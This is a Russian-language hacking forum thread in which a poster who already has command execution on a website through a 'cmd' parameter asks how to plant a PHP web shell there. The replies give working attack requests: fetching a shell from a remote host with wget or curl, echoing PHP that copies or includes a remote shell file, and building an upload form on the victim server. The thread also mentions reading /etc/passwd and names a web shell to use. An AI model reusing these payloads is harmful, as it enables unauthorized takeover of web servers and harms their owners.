Народ подскажите как можно закачать шел(хотябы от рст).Из качалок есть wget.При запросе http://site.com/t.php?cmd=wget%20-o%201.php%20http://site.com/shell.txt создается файл 1.php а в нем --11:39:54-- http://site.com/shell.txt => `shell.txt' Resolving site.com Connecting to site.com:80... failed: Connection refused. Из конфигов пароли не подходят к фтп.
а другие качалки не пробовал, должен быть наверняка lynx. а может еще эти fetch, curl, links (??), get http://someshit.com/a.php > shell.php(/somedir/1.txt), хз больше не помню.. и еще закачай маленький по размеру шелл, например TNC WebShell v0.8 (см. в разделе "Избранное") а то хз чз адрес бар иногда лаги.. иногда у меня через адрес бар не читается /etc/passwd хотя весит пару сотен килобайт.. )) кароче эксперементируй ))
или попробуй скачивать шелл с другого сайта или такой вариант Code: http://site.com/t.php?cmd=echo '<?php copy("http://shellsite.com/shell.txt","1.php"); ?>'>cp.php а потом вызови http://site.com/cp.php
либо так же как Scipio сказал, но через инклуд echo+'<?php+include("http://shellsite.com/shell.txt");+?>'>thumb.db.php
ртуть других качало нету только wget шел 8кб тоже не качает.через браузер в 1 строчку создает но небольше Scipio вот такое вылазиет после запуска: Warning: copy() [function.copy]: php_network_getaddresses: getaddrinfo failed: Name or service not known in /www/vhosts/1/www/cp.php on line 1 Warning: copy(http://site.com/shell.txt) [function.copy]: failed to open stream: Success in /www/vhosts/1/www/cp.php on line 1 TANZWUT вот такое вылазиет после запуска: Warning: include() [function.include]: php_network_getaddresses: getaddrinfo failed: Name or service not known in /www/vhosts/1/www/thumb.db.php on line 1 Warning: include(http://site/shell.txt) [function.include]: failed to open stream: Success in /www/vhosts/1/www/thumb.db.php on line 1 Warning: include() [function.include]: Failed opening 'http://site/shell.txt' for inclusion (include_path='.:/usr/local/include/php') in /www/vhosts/1/www/thumb.db.php on line 1 Какие есть еще идеи?
попробуй этот код PHP: '<form enctype=multipart/form-data method=post><input name=userfile type=file><input type=submit name=go_up></form> <?php if(isset($_POST[go_up])){if(is_uploaded_file($_FILES[userfile][tmp_name])){@copy($_FILES[userfile][tmp_name],$_FILES[userfile][name]);}}; ?>' т.о. со своего компа загрузиш шелл
ну я тогда незнаю тока такой вариант: Code: http://site.com/t.php?cmd=echo '<?php $filename = $_FILES['userfile']['name']; move_uploaded_file($_FILES['userfile']['tmp_name'], "shell.php");?>'>cp.php http://site.com/t.php?cmd=echo '<form enctype="multipart/form-data" method="post">'>>cp.php http://site.com/t.php?cmd=echo 'Отправить этот файл: <input name="userfile" type="file" />'>>cp.php http://site.com/t.php?cmd=echo '<input type="submit" value="Send File" /></form>'>>cp.php и запускай http://site.com/cp.php
